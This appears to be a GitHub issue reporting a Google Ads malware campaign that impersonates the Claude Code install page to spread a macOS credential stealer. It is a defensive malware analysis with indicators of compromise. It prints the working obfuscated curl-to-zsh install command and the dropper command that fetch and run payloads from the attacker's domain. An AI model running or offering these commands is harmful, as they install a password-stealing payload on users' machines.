Malware campaign impersonating Claude Code install via Google Ads

Resolved 💬 7 comments Opened Mar 15, 2026 by aadaam Closed May 30, 2026

Summary

A malware campaign is actively targeting users searching for "claude code install" via Google Ads. The sponsored result leads to a fake install page that distributes a macOS credential stealer.

Distribution

Fake install page (Google Ads sponsored result):
https://claudecodeupdate.squarespace.com/

This page appeared as a top result for the query "claude code install" and instructs users to run an obfuscated curl command in their terminal.

Obfuscated install command served by the page:

curl -ksfLS $(echo 'aHR0cHM6Ly93b3VwcC5jb20vY3VybC81YmQxYzJhZGIzMjAyOGVjM2FkNmY1N2UxYzJjMDg4MGQ1MmI3OWMyZmI4ZDUwNDc0OTBkZjJjOGMxZTFmOThj'|base64 -D) | zsh

The base64 decodes to: https://woupp.com/curl/5bd1c2adb32028ec3ad6f57e1c2c0880d52b79c2fb8d5047490df2c8c1e1f98c

Attack Chain (fully reverse-engineered)

Stage 1: Dropper script

The curl downloads a small zsh script containing a gzipped+base64 payload that decodes to:

curl -o /tmp/helper https://woupp.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper

Stage 2: Native binary (/tmp/helper)

  • Type: Mach-O universal binary (x86_64 + arm64), unsigned
  • Size: 15,891,320 bytes
  • SHA-256: 853c4b09cc8e4efb90f42f9bc81e1f7adb6fdc1a766e4abaf933b7aaee9657fa
  • Linked libs: only libSystem.B.dylib + libc++.1.dylib
  • Obfuscation: All strings/scripts XOR-encrypted in a 6.7 MB __const section; decrypted at runtime
  • Execution method: fork()pipe() + dup2()execl("/bin/bash", "/bin/bash", "-s", NULL) → feeds decrypted commands via write()

Stage 3: Credential stealing (via osascript/AppleScript)

The decrypted payload executes two osascript processes that:

  1. Request TCC AppleEvents permission for Terminal
  2. Browse /Applications/ via Finder (fndr,gstl) for reconnaissance
  3. Hide the Terminal window (core,setd → Terminal)
  4. Gather system info via multiple do shell script calls
  5. Write a machine fingerprint hash to ~/.username
  6. Display a fake password dialog (syso,dlog) to social-engineer the user's macOS password
  7. Write the captured password to ~/.pass
  8. Create temporary staging files, read system data
  9. Exfiltrate collected data via curl back to woupp.com
  10. Clean up temporary files

Indicators of Compromise (IOCs)

| Type | Value |
|------|-------|
| Distribution URL | https://claudecodeupdate.squarespace.com/ |
| C2 Domain | woupp.com |
| C2 IPs (Cloudflare) | 188.114.97.3, 188.114.96.3 |
| C2 IPv6 | 2a06:98c1:3120::3, 2a06:98c1:3121::3 |
| Dropper URL | https://woupp.com/curl/5bd1c2adb32028ec3ad6f57e1c2c0880d52b79c2fb8d5047490df2c8c1e1f98c |
| Binary URL | https://woupp.com/n8n/update |
| Binary SHA-256 | 853c4b09cc8e4efb90f42f9bc81e1f7adb6fdc1a766e4abaf933b7aaee9657fa |
| SSL Cert | Let's Encrypt E8, issued 2026-03-09, CN=woupp.com |
| Dropped files | ~/.username, ~/.pass |
| TCC modification | kTCCServiceAppleEvents granted to com.apple.Terminal |

Recommendations

  1. Report claudecodeupdate.squarespace.com to Google Ads for malware distribution via sponsored results
  2. Report woupp.com to Cloudflare (abuse@cloudflare.com) — domain is behind Cloudflare proxy
  3. Consider adding a security notice to the official Claude Code install documentation warning about fake install pages
  4. The official install method should be clearly documented and easily distinguishable from social engineering attempts

View original on GitHub ↗

This issue has 7 comments on GitHub. Read the full discussion on GitHub ↗